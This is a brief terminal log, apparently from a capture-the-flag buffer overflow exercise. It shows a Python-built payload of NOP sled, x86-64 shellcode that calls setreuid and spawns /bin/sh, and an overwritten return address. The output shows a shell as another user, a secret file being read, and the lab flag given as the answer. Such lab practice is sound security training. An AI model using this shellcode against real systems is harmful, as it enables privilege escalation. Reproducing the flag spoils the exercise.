[user1@ip-10-10-189-18 overflow-4]$ ./buffer-overflow-2 $(python -c "print('\x90'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + '\x90'*19 + '\x68\xe2\xff\xff\xff\x7f')") new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1��������������������h���� sh-4.2$ whoami user3 sh-4.2$ cat secret.txt wowanothertime!!
Answer: wowanothertime!!